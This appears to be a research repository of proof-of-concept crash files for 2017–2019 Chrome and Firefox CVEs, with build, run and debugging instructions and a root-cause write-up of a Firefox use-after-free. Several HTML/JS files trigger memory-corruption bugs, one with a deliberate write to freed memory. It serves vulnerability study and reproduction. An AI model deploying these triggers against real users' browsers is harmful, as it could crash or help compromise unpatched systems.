├── .DS_Store
├── Chrome
    ├── .DS_Store
    ├── CVE-2018-18337
    │   ├── crash.html
    │   └── empty.css
    ├── CVE-2018-6060
    │   └── crash.html
    ├── CVE-2018-6123
    │   └── crash.html
    ├── CVE-2019-5786
    │   ├── crash.html
    │   └── crash2.html
    ├── CVE-2019-5805
    │   ├── crash.html
    │   └── pattern3.pdf
    ├── CVE-2019-5808
    │   ├── animimg.svg
    │   └── crash.html
    └── README.md
├── Firefox
    ├── .DS_Store
    ├── CVE-2017-7784
    │   ├── .DS_Store
    │   ├── 1px.png
    │   ├── crash.html
    │   └── data.html
    ├── CVE-2017-7828
    │   ├── .DS_Store
    │   ├── README.md
    │   ├── crash.html
    │   ├── exploit.html
    │   ├── images
    │   │   ├── .DS_Store
    │   │   ├── crash.png
    │   │   ├── image1.png
    │   │   ├── image2.png
    │   │   ├── image3.png
    │   │   ├── image4.png
    │   │   └── image5.png
    │   ├── mozconfig
    │   ├── scripts.html
    │   └── user.js
    ├── CVE-2018-12386
    │   ├── .DS_Store
    │   ├── README.md
    │   ├── crash.js
    │   └── pwn.js
    ├── CVE-2018-12387
    │   ├── .DS_Store
    │   ├── README.md
    │   ├── crash.html
    │   └── crash.js
    ├── CVE-2018-18492
    │   ├── .DS_Store
    │   ├── README.md
    │   ├── crash.html
    │   ├── images
    │   │   ├── .DS_Store
    │   │   ├── crash.png
    │   │   ├── image1.png
    │   │   ├── image2.png
    │   │   ├── image3.png
    │   │   ├── image4.png
    │   │   └── image5.png
    │   ├── mozconfig
    │   └── user.js
    ├── CVE-2018-5093
    │   ├── .DS_Store
    │   ├── README.md
    │   └── crash.html
    ├── CVE-2018-5094
    │   ├── .DS_Store
    │   ├── README.md
    │   ├── crash.html
    │   └── crash.js
    ├── CVE-2018-5097
    │   ├── .DS_Store
    │   ├── README.md
    │   ├── crash.html
    │   ├── ctop.xsl
    │   ├── math.xml
    │   ├── mathml.xsl
    │   └── pmathml.xsl
    ├── CVE-2018-5100
    │   ├── .DS_Store
    │   ├── README.md
    │   ├── crash.html
    │   ├── images
    │   │   ├── .DS_Store
    │   │   ├── crash.png
    │   │   ├── image1.png
    │   │   └── image2.png
    │   ├── mozconfig
    │   └── user.js
    ├── CVE-2018-5102
    │   ├── .DS_Store
    │   ├── README.md
    │   ├── crash.html
    │   └── image1.png
    ├── CVE-2018-5104
    │   ├── .DS_Store
    │   ├── README.md
    │   ├── crash.html
    │   └── images
    │   │   ├── .DS_Store
    │   │   ├── 1.png
    │   │   ├── 2.png
    │   │   ├── 3.png
    │   │   └── code.png
    ├── CVE-2018-5127
    │   ├── .DS_Store
    │   ├── README.md
    │   └── crash.html
    ├── CVE-2018-5129
    │   ├── README.md
    │   └── oob.html
    ├── CVE-2019-11707
    │   ├── .DS_Store
    │   ├── README.md
    │   ├── crash.js
    │   ├── exploit.js
    │   └── index.html
    ├── CVE-2019-9791
    │   ├── .DS_Store
    │   ├── README.md
    │   ├── crash.js
    │   └── exploit.js
    ├── CVE-2019-9813
    │   ├── .DS_Store
    │   ├── README.md
    │   └── crash.js
    ├── README.md
    ├── mozconfig
    ├── mozconfig_dbg
    ├── others
    │   ├── .DS_Store
    │   ├── CVE-2017-7802
    │   │   └── crash.html
    │   ├── CVE-2017-7806
    │   │   ├── .DS_Store
    │   │   ├── 05crab.svg
    │   │   ├── crash.html
    │   │   └── data.html
    │   ├── CVE-2017-7809
    │   │   └── crash.html
    │   ├── CVE-2017-7818
    │   │   └── crash.html
    │   ├── CVE-2017-7819
    │   │   ├── .DS_Store
    │   │   ├── crash.html
    │   │   ├── crash.xml
    │   │   ├── crash.xsl
    │   │   └── text.html
    │   ├── CVE-2018-18500
    │   │   ├── .DS_Store
    │   │   ├── crash.html
    │   │   └── server.py
    │   ├── CVE-2018-5091
    │   │   ├── .DS_Store
    │   │   └── crash.html
    │   ├── CVE-2018-5098
    │   │   ├── .DS_Store
    │   │   ├── crash.html
    │   │   └── data.html
    │   ├── CVE-2018-5099
    │   │   ├── crash.html
    │   │   └── data.html
    │   ├── CVE-2018-5101
    │   │   └── crash.html
    │   ├── CVE-2018-5103
    │   │   └── crash.html
    │   ├── CVE-2018-5128
    │   │   └── crash.html
    │   ├── CVE-2018-5154
    │   │   ├── .DS_Store
    │   │   ├── crash.html
    │   │   └── test.svg
    │   └── CVE-2019-9810
    │   │   ├── .DS_Store
    │   │   ├── README.md
    │   │   └── overflow.js
    └── troubleshooting.md
└── README.md


/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/.DS_Store


--------------------------------------------------------------------------------
/Chrome/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Chrome/.DS_Store


--------------------------------------------------------------------------------
/Chrome/CVE-2018-18337/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	location.href;
 4 | 	var links=[];
 5 | 	for(var x=0; x<20; x++) {
 6 | 		links[x]=document.createElementNS('http://www.w3.org/1999/xhtml','link');
 7 | 		links[x].setAttribute('href','empty.css?'+x);
 8 | 	}
 9 | 	o19=document.createElementNS('http://www.w3.org/1999/xhtml','META');
10 | 	o707=window.document;
11 | 	o1261=o707.createElementNS('http://www.w3.org/1999/xhtml','table');
12 |         o1533=o1261.createShadowRoot();
13 |         window.top.document.body.appendChild(o1261);
14 | 	for(var x=0; x<20; x++) o1533.appendChild(links[x]);
15 | 	o2145=o707.createElementNS('http://www.w3.org/1999/xhtml','iframe');
16 | 	window.top.document.body.appendChild(o2145);
17 | 	o2435=document.createElementNS('http://www.w3.org/1999/xhtml','marquee');
18 | 	for(var x=0; x<20; x++) links[x].setAttribute('rel','stylesheet');	              
19 | 	o2493=document.createElementNS('http://www.w3.org/1999/xhtml','details');
20 | 	o2494=document.createElementNS('http://www.w3.org/1999/xhtml','summary');
21 | 	o2493.appendChild(o2494);
22 | 	o2494.appendChild(o2435);
23 | 	document.documentElement.appendChild(o2493);
24 | 	gc();gc();gc();gc();
25 | 	location.reload();
26 | }
27 | </script>
28 | <body onload="start()"></body>
29 | 


--------------------------------------------------------------------------------
/Chrome/CVE-2018-18337/empty.css:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Chrome/CVE-2018-18337/empty.css


--------------------------------------------------------------------------------
/Chrome/CVE-2018-6060/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | try{var audioContext1 = new AudioContext();}catch(e){}
 3 | try{var destination1 = audioContext1.destination;}catch(e){}
 4 | try{var audioContext2 = new AudioContext();}catch(e){}
 5 | try{analyser2.getByteTimeDomainData(dataArray2);}catch(e){}
 6 | feedforward = new Float32Array(2);
 7 | feedback = new Float32Array(2);
 8 | for (var i=0; i<2; i++){feedforward[i] = 0x42;}
 9 | for (var i=0; i<2; i++){feedback[i] = 0x2;}
10 | try{var waveShaper1 = audioContext1.createWaveShaper();}catch(e){}
11 | try{waveShaper1.oversample = '2x';}catch(e){}
12 | real = new Float32Array(1);
13 | for (var i=0; i<1; i++){real[i] = 0x46;}
14 | try{var pannerNode2 = audioContext2.createPanner();}catch(e){}
15 | try{pannerNode2.refDistance = 6;}catch(e){}
16 | try{var offlineCtx1 = new OfflineAudioContext(16,44100*40,44100);}catch(e){}
17 | try{offlineCtx1.startRendering();}catch(e){}
18 | try{oscNode1.start();}catch(e){}
19 | try{var pannerNode1 = audioContext1.createPanner();}catch(e){}
20 | try{SpannerNode3.connect(mediaElmDest3);}catch(e){}
21 | setTimeout(function(){try{scriptProcessorNode2.disconnect(waveShaper2, 1, 0);}catch(e){}}, 225);
22 | try{analyser2.getFloatFrequencyData(floatDataArray2);}catch(e){}
23 | try{audioContext1.suspend();}catch(e){}
24 | try{var mediaElmDest3 = audioContext3.createMediaStreamDestination();}catch(e){}
25 | for (var i=0; i<19; i++){feedback[i] = 0x2;}
26 | try{var iirFilter1 = audioContext1.createIIRFilter(feedforward, feedforward.reverse() );}catch(e){}
27 | try{var scriptProcessorNode4 = audioContext4.createScriptProcessor(8192, 22, 22);}catch(e){}
28 | try{var analyser2 = audioContext2.createAnalyser();}catch(e){}
29 | try{analyser2.fftSize = 256;}catch(e){}
30 | try{var bufferLength2 = analyser2.frequencyBinCount;}catch(e){}
31 | try{var floatDataArray2 = new Float32Array(bufferLength2);}catch(e){}
32 | try{gainNode4.connect(channelSplitter4);}catch(e){}
33 | try{compressorNode3.connect(filterNode3);}catch(e){}
34 | try{pannerNode1.connect(waveShaper1);}catch(e){}
35 | try{oscNode3.connect(analyser3);}catch(e){}
36 | try{var bufferLength1 = analyser1.frequencyBinCount;}catch(e){}
37 | try{var floatDataArray1 = new Float32Array(bufferLength1);}catch(e){}
38 | try{listener4.speedOfSound=128.48;}catch(e){}
39 | try{var waveShaper1 = audioContext1.createWaveShaper();}catch(e){}
40 | try{var length2 = audioContext2.sampleRate * 2;}catch(e){}
41 | try{var audioBuffer2 = audioContext2.createBuffer(1, length2, audioContext2.sampleRate);}catch(e){}
42 | try{audioBuffer2.length = 11654;}catch(e){}
43 | var anotherArray2 = new Float32Array;
44 | try{ audioBuffer2.copyFromChannel(anotherArray2, 4, 6);}catch(e){}
45 | var anotherArray2 = new Float32Array;
46 | try{ audioBuffer2.copyToChannel(anotherArray2, 2, 7);}catch(e){}
47 | try{var offlineCtx4 = new OfflineAudioContext(26,44100*40,44100);}catch(e){}
48 | try{offlineCtx4.startRendering();}catch(e){}
49 | try{oscNode4.stop();}catch(e){}
50 | try{audioBufferSource1.loopEnd = 8;}catch(e){}
51 | try{audioBufferSource1.loopStart = 5;}catch(e){}
52 | try{var channelData3 = audioBuffer3.getChannelData(3);}catch(e){}
53 | try{listener1.dopplerFactor=1;}catch(e){}
54 | try{audioBufferSource3.start();}catch(e){}
55 | try{audioContext1.resume();}catch(e){}
56 | try{var gainNode4 = audioContext4.createGain();}catch(e){}
57 | try{gainNode4.gain.value = 1;}catch(e){}
58 | try{listener4.setPosition(1,9,3);}catch(e){}
59 | try{var dataArray4 = new Uint8Array(bufferLength4);}catch(e){}
60 | try{analyser4.getByteTimeDomainData(dataArray4);}catch(e){}
61 | try{var pannerNode1 = audioContext1.createPanner();}catch(e){}
62 | try{pannerNode1.distanceModel = 'exponential';}catch(e){}
63 | try{pannerNode1.maxDistance = 8523;}catch(e){}
64 | try{var myFrequencyArray = new Float32Array(29);;}catch(e){}
65 | for (var i=0; i<29; i++){myFrequencyArray[i] = 0x44;}
66 | myFrequencyArray[3]=31337;
67 | try{var magResponseOutput = new Float32Array(29);}catch(e){}
68 | try{audioBuffer4.sampleRate = 44100;}catch(e){}
69 | try{audioBuffer4.numberOfChannels= 4;}catch(e){}
70 | var anotherArray4 = new Float32Array;
71 | try{ audioBuffer4.copyFromChannel(anotherArray4, 1, 8);}catch(e){}
72 | try{audioContext4.resume();}catch(e){}
73 | try{var offlineCtx1 = new OfflineAudioContext(26,44100*40,44100);}catch(e){}
74 | try{offlineCtx1.startRendering();}catch(e){}
75 | try{var gainNode3 = audioContext3.createGain();}catch(e){}
76 | try{gainNode3.gain.value = 0;}catch(e){}
77 | try{var oscNode4 = audioContext4.createOscillator();}catch(e){}
78 | try{oscNode4.detune.value = 71;}catch(e){}
79 | try{var listener1 = audioContext1.listener;}catch(e){}
80 | try{audioBufferSource1.start();}catch(e){}
81 | try{var dataArray2 = new Uint8Array(bufferLength2);}catch(e){}
82 | try{analyser2.getByteFrequencyData(dataArray2);}catch(e){}
83 | </script>
84 | <script type="text/javascript">document.addEventListener("DOMContentLoaded", function() {  location = '';});</script>
85 | 


--------------------------------------------------------------------------------
/Chrome/CVE-2018-6123/crash.html:
--------------------------------------------------------------------------------
1 | <script>
2 | var reader =  new FileReader();
3 | reader.onloadstart = function(e) {
4 |   reader.abort();
5 |   reader.readAsDataURL(new Blob([""], {type : "text/html"}));
6 | }
7 | reader.readAsText(new Blob([""], {type : "text/html"}));
8 | </script>
9 | 


--------------------------------------------------------------------------------
/Chrome/CVE-2019-5786/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | {
 3 |   const reader = new FileReader;
 4 |   reader.onprogress = function() { 
 5 |     const buf1 = reader.result;
 6 |     const buf2 = reader.result;
 7 |     // Usually, these are the same ArrayBuffer, but every once in awhile
 8 |     // they're different! Yet they still point to the same backing store.
 9 |     if (buf1 !== buf2) {
10 |       try {
11 |         // postMessage will detach buf1.
12 |         // "J" is an invalid origin, thus the need for try/catch.
13 |         window.postMessage([buf1], "J", [buf1]);
14 |       } catch { }
15 |       let view = new Uint32Array(buf2);
16 | 	Math.cos(1);
17 |       // This is the invalid write.
18 |       view[0] = 1048576;
19 |     }
20 |   };
21 |   reader.onload = function() {
22 |     // This seems to be where things go wrong. adamk suspects
23 |     // re-entrancy problems.
24 |     reader.readAsArrayBuffer(new Blob([1, 2, 3, 4]));
25 |   };
26 |   // This just kicks off the machinery operation;
27 |   // the fact that it's an empty blob is not important to the exploit.
28 |   reader.readAsArrayBuffer(new Blob());
29 | }
30 | </script>
31 | 


--------------------------------------------------------------------------------
/Chrome/CVE-2019-5786/crash2.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function x() {
 3 |     var a = [];
 4 |     a.push(new ArrayBuffer(8));
 5 | 
 6 |     function s(e, t) {
 7 |         let i = new FileReader;
 8 |         let a = 0;
 9 |         let r = false;
10 |         i.onloadstart = function() {};
11 |         i.onprogress = function(e) {
12 |             a += 1;
13 |             if (r) return;
14 |             if (e.loaded != e.total) return;
15 |             try {
16 |                 t(this.result, this.result);
17 |                 r = true
18 |             } catch (e) {}
19 |         };
20 |         i.onload = function() {
21 |             if (r) return;
22 |             a = 0;
23 |             this.readAsArrayBuffer(new Blob([e]))
24 |         };
25 |         i.readAsArrayBuffer(new Blob([e]))
26 |     }
27 |     u();
28 | 
29 |     function u(i) {
30 |         let l = new ArrayBuffer(4);
31 |         let g = undefined;
32 |         let f = undefined;
33 |         s(l, function(l, s) {
34 |             try {
35 |                 window.postMessage([l], "J", [l])
36 |             } catch (e) {}
37 |             let c = new Uint8Array(s);
38 |             g = s;
39 |             v(g);
40 | 
41 |             function v(l) {
42 |                 // l is freed?
43 |                 let s = new Uint32Array(l);
44 |                 s[0] = 1048576;
45 |                 let z = 0;
46 |                 do {
47 |                     a.push(new ArrayBuffer(4));
48 |                     z++;
49 |                     if (z > 50) { // fail?
50 |                         return
51 |                     }
52 |                 } while (s[0] != 0);
53 | 		Math.cos(1);
54 |                 f = new Uint32Array(new ArrayBuffer(4)); // trigger crash
55 |                 return
56 |             }
57 |         })
58 |     }
59 | }
60 | x();
61 | </script>
62 | 


--------------------------------------------------------------------------------
/Chrome/CVE-2019-5805/crash.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <body>
 3 | <embed id=e height=700 width=500 src="pattern3.pdf"></embed>
 4 | <script>
 5 | setTimeout(function() {
 6 |   e.width=700;
 7 | },20000);
 8 | </script>
 9 | </body>
10 | </html>
11 | 
12 | 


--------------------------------------------------------------------------------
/Chrome/CVE-2019-5805/pattern3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Chrome/CVE-2019-5805/pattern3.pdf


--------------------------------------------------------------------------------
/Chrome/CVE-2019-5808/animimg.svg:
--------------------------------------------------------------------------------
 1 | <svg xmlns:xlink="http://www.w3.org/1999/xlink"  xmlns="http://www.w3.org/2000/svg">
 2 |   <g id="SVG_Start">   
 3 |  <rect fill="white" x="0" y="0" width="512" height="384">    <animate id="Sa" begin="0s;Sa.end" dur="0.3s" attributeName="visibility" from="visible" to="visible" /></rect>  </g>
 4 |   <rect fill="black" width="512" height="384">    <set fill="freeze" begin="0s" attributeName="display" to="none" /></rect>
 5 | 	<g id="P2a1">
 6 |   <path fill="none" stroke="none" stroke-width="1.00">    <animate fill="freeze" begin="Sa.begin+0.00s" dur="0.1s"  attributeName="d"      from="M-107.81,-15.38Q-107.12,-18.69 -104.75,-18.50 Q-100.62,-15.00 -99.12,-10.44 Q-101.94,-8.00 -106.56,-9.19 Q-108.50,-11.69 -107.81,-15.38 Z"      to="M-107.81,-15.38Q-107.12,-18.69 -104.75,-18.50 Q-100.62,-15.00 -99.12,-10.44 Q-101.94,-8.00 -106.56,-9.19 Q-108.50,-11.69 -107.81,-15.38 Z" />    <set fill="freeze" begin="Sa.begin+0.1s"  attributeName="d" to="M0,0" />  </path>
 7 |   <path fill="#e8e8e8" stroke="none">    <animate fill="freeze" begin="Sa.begin+0.10s" dur="0.05s"  attributeName="d"      from="M250.81,286.69Q320.31,287.56 372.25,298.88 Q419.06,311.50 422.94,328.44 Q419.12,345.31 372.44,357.88 Q320.69,369.12 251.19,370.06 Q181.56,369.12 129.69,357.88 Q82.88,345.31 79.06,328.44 Q82.75,311.50 129.44,298.88 Q181.19,287.56 250.81,286.69 Z"      to="M250.88,290.62Q313.88,291.38 360.94,301.69 Q403.38,313.06 406.88,328.44 Q403.44,343.69 361.12,355.12 Q314.19,365.38 251.19,366.19 Q188.06,365.38 141.06,355.12 Q98.62,343.69 95.19,328.44 Q98.50,313.06 140.88,301.69 Q187.81,291.38 250.88,290.62 Z" />    <set fill="freeze" begin="Sa.begin+0.15s"  attributeName="d" to="M0,0" />      to="M300.25,134.69Q302.06,131.62 303.19,125.31 Q302.81,118.88 300.12,111.94 Q297.81,105.62 293.75,100.56 Q289.69,95.38 283.50,91.88 Q277.38,88.06 268.56,87.12 Q257.50,86.94 247.44,89.50 Q239.88,92.00 236.06,95.75 Q230.06,100.50 229.88,102.69 Q233.00,101.44 241.38,98.69 Q248.69,98.19 256.00,99.44 Q262.00,100.62 267.06,102.44 Q272.75,103.31 277.62,105.50 Q281.50,108.56 285.44,113.62 Q291.62,120.06 295.88,124.56 " />    <set fill="freeze" begin="Sa.begin+0.15s"  attributeName="d" to="M0,0" />      to="M305.50,136.88Q307.88,133.38 312.75,128.88 Q317.56,125.75 322.56,124.81 Q327.00,123.81 330.44,125.38 Q333.88,126.75 335.94,131.25 Q338.06,135.50 337.94,144.12 Q336.94,155.31 334.00,167.06 Q331.25,176.19 328.06,182.12 Q323.88,190.75 322.25,192.19 Q323.44,188.25 326.38,178.25 Q327.50,170.38 327.38,163.62 Q327.06,158.00 326.25,153.81 Q326.19,148.38 325.12,144.56 Q323.19,142.19 319.81,140.94 Q315.50,137.94 312.62,135.88 " />    <set fill="freeze" begin="Sa.begin+0.45s"  attributeName="d" to="M0,0" />  </path>
 8 |     <path fill="none" stroke="none" stroke-width="1.00" d="M-107.81,-15.38Q-107.12,-18.69 -104.75,-18.50 Q-100.62,-15.00 -99.12,-10.44 Q-101.94,-8.00 -106.56,-9.19 Q-108.50,-11.69 -107.81,-15.38 Z"></path>
 9 |   </g>
10 | </svg>
11 | 


--------------------------------------------------------------------------------
/Chrome/CVE-2019-5808/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	Math.cos(1);
 4 | 	o58=document.createElement('style');
 5 | 	o59=document.createTextNode('#id11:only-of-type  { background-image: url("animimg.svg");  }');
 6 | 	o58.appendChild(o59);
 7 | 	o134=document.createElement('iframe');
 8 | 	try{while(document.removeChild(document.firstChild));}catch(e){}
 9 | 	o135=document.implementation.createHTMLDocument();
10 | 	o135.body.appendChild(o58);
11 | 	o135.body.appendChild(o134);
12 | 	document.appendChild(o135.documentElement);
13 | 	document.documentElement.setAttribute('id',unescape('id11'));
14 | 	document.documentElement.contentEditable=false;
15 | 	o298=window.top.frames[0];
16 | 	document.open(); document.write('x'); document.close();
17 | 	gc();gc();gc();gc();
18 | 	location.href='javascript:location.href="crash.html"';
19 | 	setTimeout("window.top.location.href='crash.html'",400);
20 | 	Math.cos(1);
21 | }
22 | </script>
23 | <body onload="start()"></body>
24 | 


--------------------------------------------------------------------------------
/Chrome/README.md:
--------------------------------------------------------------------------------
  1 | # Reproducing Chrome vulnerabilities
  2 | 
  3 | [Build](#build)
  4 | 
  5 | [Run](#run)
  6 | 
  7 | [Debug](#debug)
  8 | 
  9 | ## Build
 10 | 
 11 | ### Existing builds
 12 | 
 13 | Chrome has asan linux builds that can be used without building. If a vulnerability is known to be reproducable in a version of asan linux build, download directly using **gsutil**:
 14 | 
 15 | - install [gsutil](https://cloud.google.com/storage/docs/gsutil_install#sdk-install)
 16 | 
 17 | - copy an asan linux release build:
 18 | 
 19 | 	```gsutil cp gs://chromium-browser-asan/linux-release/asan-linux-release-<build id>.zip```
 20 | 
 21 | 
 22 | ### Own builds
 23 | 
 24 | :point_right: [Tutorial](https://chromium.googlesource.com/chromium/src/+/master/docs/linux/build_instructions.md)
 25 | 
 26 | #### 0. (First time only) install depot tool
 27 | 
 28 | ```
 29 | 	git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
 30 | ```
 31 | 
 32 | add path of depot tool to $PATH, e.g. ```export PATH="$PATH:${HOME}/depot_tools"```
 33 | 
 34 | #### 1. get the code
 35 | 
 36 | ```
 37 | 	mkdir ~/chromium && cd ~/chromium
 38 | 	fetch --nohooks chromium
 39 | ```
 40 | 
 41 | To [checkout whatever version you need](http://www.chromium.org/developers/how-tos/get-the-code/working-with-release-branches):
 42 | ```
 43 | 	git fetch --tags
 44 | 	git checkout refs/tags/<version number>
 45 | 	gclient sync --with_branch_heads --with_tags
 46 | ```
 47 | 
 48 | #### 2. build dependency
 49 | ```
 50 | 	cd src
 51 | 	./build/install-build-deps.sh
 52 | 	gclient runhooks
 53 | ```
 54 | 
 55 | #### 3. configuration
 56 | ```
 57 | 	gn args out/<build name>
 58 | ```
 59 | then enter configurations. For example, for an [asan build](https://chromium.googlesource.com/chromium/src/+/HEAD/docs/asan.md):
 60 | ```
 61 | 	is_asan= true
 62 | 	is_debug = false
 63 | ```
 64 | 
 65 | #### 4. build
 66 | ```
 67 | 	autoninja -C out/<build name> chrome
 68 | ```
 69 | 
 70 | Other component can be built instead of chrome. For example, if just to build content shell: ```autoninja -C out/<build name> content_shell```
 71 | 
 72 | 
 73 | ## Run
 74 | 
 75 | In build directory, run ```./chrome [<flag>]``` (or the component you built)
 76 | 
 77 | A list of flags available :point_right: [:link:](https://peter.sh/experiments/chromium-command-line-switches/)
 78 | 
 79 | ### headless chrome
 80 | 
 81 | [Headless chrome](https://developers.google.com/web/updates/2017/04/headless-chrome) is supported:
 82 | 
 83 | run ```./chrome --no-sandbox --headless --disable-gpu <HTML file/ URL>```.
 84 | 
 85 | ### run with asan
 86 | 
 87 | set asan flags: ``` export ASAN_OPTIONS="symbolize=1 external_symbolizer_path=../../third_party/llvm-build/Release+Asserts/bin/llvm-symbolizer detect_leaks=0 detect_odr_violation=0"```
 88 | 
 89 | then run as normal.
 90 | 
 91 | ### trouble shooting
 92 | 
 93 | 1. **run in remote server without a display**
 94 | 
 95 | use xvfb:
 96 | ```
 97 | 	sudo Xvfb :10 -ac
 98 | 	export DISPLAY=:10
 99 | ```
100 | 
101 | 2. WARNING:discardable_shared_memory_manager.cc(188)] Less than 64MB of free space in temporary directory for shared memory files: 60
102 | 
103 | use flag: --disable-dev-shm-usage
104 | 
105 | 3. **Failed to connect to the bus**: Failed to connect to socket /var/run/dbus/system_bus_socket: No such file or directory
106 | 
107 | check if there is ```system_bus_socket``` in ```/var/run/dbus/```, if not:
108 | 
109 | ```
110 | 	sudo /etc/init.d/dbus restart
111 | ```
112 | 
113 | and check again. ([:link:](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=444668))
114 | 
115 | 
116 | ## Debug
117 | 
118 | :point_right: [tutorial](https://chromium.googlesource.com/chromium/src/+/81c0fc6d4/docs/linux_debugging.md)
119 | 
120 | :point_right: [debug blink](https://www.chromium.org/blink/getting-started-with-blink-debugging)
121 | 
122 | To debug renderer:
123 | 
124 | ```
125 | 	./content_shell --no-sandbox --renderer-startup-dialog --headless --disable-gpu /path/to/html
126 | ```
127 | 
128 | This will pause the renderer. Attach the renderer process to gdb:
129 | 
130 | ```
131 | 	gdb -p <pid>
132 | ```
133 | 
134 | To continue the render, send signal in gdb: ```signal SIGUSR1```
135 | 


--------------------------------------------------------------------------------
/Firefox/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7784/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2017-7784/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7784/1px.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2017-7784/1px.png


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7784/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	o0=document.createElement('iframe');
 4 | 	document.body.appendChild(o0);
 5 | 	o1=open('1px.png','popup46','height=16');
 6 | 	o1.onload=fun0;
 7 | 	o2=o0.contentDocument;
 8 | }
 9 | function fun0(e) {
10 |         o10=window.open('data.html','popup68','left=74');
11 |         o10.onload=fun1;
12 | 	o13=e.target;
13 | 	tmpall=o13.getElementsByTagName('*');
14 | 	o19=tmpall[8];
15 | }
16 | function fun1(e) {
17 | 	o21=e.target;
18 | 	o71=o2.createElementNS('http://www.w3.org/2000/svg','filter');
19 | 	o92=o2.createElementNS('http://www.w3.org/2000/svg','feBlend');
20 | 	o71.appendChild(o92);
21 | 	tmpall[0].appendChild(o71);
22 | 	o111=o21.createElementNS('http://www.w3.org/2000/svg','filter');
23 | 	o145=o21.createElementNS('http://www.w3.org/2000/svg','feMerge');
24 | 	o111.appendChild(o145);
25 | 	o71.insertBefore(o111,o92);
26 | 	o207=o13.createElementNS('http://www.w3.org/1999/xhtml','style');
27 | 	o208=o13.createTextNode("*{ display: ruby-text-container;}");
28 | 	o207.appendChild(o208);
29 | 	o145.appendChild(o207);
30 | 	o19.setAttribute('src', '1px.png?1');
31 | 	setTimeout("location.reload()",100);
32 | }
33 | </script>
34 | <body onload="start()"></body>
35 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7784/data.html:
--------------------------------------------------------------------------------
1 | <div>


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2017-7828/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2017-7828/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2017-7828
 2 | 
 3 | A use-after-free vulnerability can occur when flushing and resizing layout because the "PressShell" object has been freed while still in use. This results in a potentially exploitable crash during these operations. This vulnerability affects Firefox < 57, Firefox ESR < 52.5, and Thunderbird < 52.5.
 4 | 
 5 | ## Firefox
 6 | 
 7 | I tested this vulnerability with Firefox 56.0 ASAN build downloaded from [here](https://ftp.mozilla.org/pub/firefox/releases/56.0/source/). The mozconfig I used is [here](https://github.com/ZihanYe/Firefox-Exploitation/blob/master/Manual%20Exploitation/CVE-2017-7828/mozconfig).
 8 | 
 9 | To build it, I had to downgrade my rust to 1.19.0 according to [Firefox's Rust Update policy](https://wiki.mozilla.org/Rust_Update_Policy_for_Firefox).
10 | 
11 | In order for making Firefox opening the PoC file without any other disruption, I used some customized preferences. Preferences can be set in ```about:config``` page in Firefox by searching for preferences listed in [user.js](https://github.com/ZihanYe/Firefox-Exploitation/blob/master/Manual%20Exploitation/CVE-2017-7828/user.js), or if you are running Firefox in headless mode (```--headless```), then create a new profile like this:
12 | 
13 | ```
14 | mkdir -p /path/to/firefox/build/directory/tmp/customized_profile
15 | ```
16 | and move [user.js]() under the new profile folder.
17 | 
18 | Run firefox with options ```--headless --no-remote --profile /path/to/the/profile/folder/just/created file:///path/to/crash.html```
19 | 
20 | ## PoC
21 | 
22 | It involves free of an ```PresShell``` object leading to a dangling pointer within an ```nsComputedDOMStyle``` object and ```nsIFrame``` object.
23 | 
24 | ![](images/crash.png)
25 | 
26 | Inside ```start``` function, an HTMLIFrameElement ```o243``` is added with source inside ```script.html```. It executes an XBL script which calls ```fun2```. In Line 28, ```fun3``` is registered as the callback function when content window resizes.
27 | 
28 | Afterwards, during loading of the window, ```GetPropertyCSSValue``` gets executed and everything happens within that context.
29 | 
30 | ## Where mPresShell is freed
31 | 
32 | At some point ```nsComputedDOMStyle::GetPropertyCSSValue``` in ```nsComputedDOMStyle.cpp``` is executed:
33 | 
34 | ![](images/image2.png)
35 | **Figure 1: GetPropertyCSSValue**
36 | 
37 | In Line 1028, it calls ```nsComputedDOMStyle::UpdateCurrentStyleSources```:
38 | 
39 | ![](images/image1.png)
40 | 
41 | In Line 828 inside ```UpdateCurrentStyleSources```, ```mPresShell``` of this ```nsComputedDOMStyle``` object is set to ```document->GetShell()```. Then in the same function, it calls ```nsComputedDOMStyle::GetStyleContext``` which result in the following stack trace:
42 | 
43 | ![](images/image3.png)
44 | 
45 | ```FireResizeEvent``` is called, which triggers the callback function (```fun3```) registered in PoC. Within the callback function, the ```PressShell``` object is freed.
46 | 
47 | ![](images/image4.png)
48 | 
